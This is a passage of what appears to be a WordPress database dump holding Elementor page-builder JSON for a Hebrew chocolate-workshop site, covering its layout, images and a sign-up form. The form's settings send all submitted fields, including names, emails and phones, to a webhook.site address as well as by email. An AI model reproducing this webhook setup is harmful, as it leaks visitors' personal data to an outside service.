\\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1504,313,'_elementor_version','0.4'),(1507,314,'_wp_page_template','elementor_header_footer'),(1508,314,'_elementor_edit_mode','builder'),(1509,314,'_elementor_template_type','post'),(1510,314,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/webhook.site\\/f2fc3aaa-aa3d-4f02-9488-5dee20f211b6\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd 